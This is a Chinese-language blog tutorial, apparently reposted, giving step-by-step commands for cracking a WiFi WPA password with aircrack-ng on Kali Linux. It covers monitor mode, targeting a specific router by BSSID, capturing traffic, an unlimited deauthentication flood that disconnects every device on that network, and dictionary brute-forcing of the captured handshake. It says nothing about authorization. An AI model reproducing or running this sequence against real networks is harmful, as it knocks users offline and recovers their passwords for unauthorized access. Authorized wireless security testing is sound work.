1. 程式人生 > >Kali aircrack-ng wifi密碼破解(暴力)

Kali aircrack-ng wifi密碼破解(暴力)

str 所有 路由器 log ash shake ssid 技術 獲取

1.kali linux安全滲透

技術分享圖片

2.工具aircrack-ng

技術分享圖片

3.ifconfig查看你的網卡信息,wlan0即無線網卡,註意,如果沒有發現網卡可能是芯片不能被識別,建議選擇網卡芯片為3037或rtl8187l的。

技術分享圖片

4。看到這個界面後輸入airmon-ng start wlan0(啟動網卡監聽模式)

技術分享圖片

5.啟動後ifconfig查看一下,如果網卡名變成了wlan0mon了,則表示操作成功。

技術分享圖片

6.掃描附近wifi

airodump-ng wlan0mon

技術分享圖片

參數詳解:

BSSID: MAC地址

PWR:信號強度,越小信號越強。

#Data:傳輸的數據, 數據越大對我們越有利, 大的誇張的可能在看電影

CH:信號頻道

ESSID:wifi名稱

抓包開始

(比如我要抓的是這個)

技術分享圖片

7.然後輸入命令:

airodump-ng -c 11 --bssid 2E:E9:D3:28:59:EB -w /home/chenglee/2018/ wlan0mon

解析:

-c代表頻道, 後面帶的是頻道

bssid: mac地址(物理地址)

-w代表目錄(抓到的握手包放在這個目錄下面)

wlan0mon: 網卡名稱

一直跑吖跑, 它的數據是不停刷新變化的...

這時候應該做點什麽了,利用deauth洪水攻擊,取消目標路由和所有設備的無線連接,這時候設備重新連接時,會抓取他的握手包,然後用字典進行爆破.

新開一個窗口觀察

ps:如果無法獲取包,攻擊路由器進行斷網重新連接

輸入:aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB wlan0mon

技術分享圖片

這時候目標路由已經斷網,如果抓到包記得ctrl+c關掉這裏,否則一直斷網就成惡作劇了。這時返回你抓包的那個窗口,如果右上角出現handshake這樣的信息(看下圖),這說明抓包已經成功。

技術分享圖片

可以進去目錄看一下

技術分享圖片

8.破解

輸入:aircrack-ng -w /home/chenglee/dictionary/wpa.txt /home/chenglee/2018/-01.cap

解析:

-w後面接的是字典

-01.cap是握手包

也許過程會有點長, 這個得看密碼復雜的與字典的好壞。

技術分享圖片

Kali aircrack-ng wifi密碼破解(暴力)